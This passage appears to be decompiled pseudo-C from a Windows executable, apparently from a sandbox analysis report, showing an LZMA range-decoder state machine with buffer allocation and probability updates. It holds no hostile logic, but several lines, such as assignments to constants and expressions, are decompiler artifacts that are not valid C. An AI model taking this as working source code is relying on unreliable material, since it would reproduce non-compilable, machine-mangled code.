													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
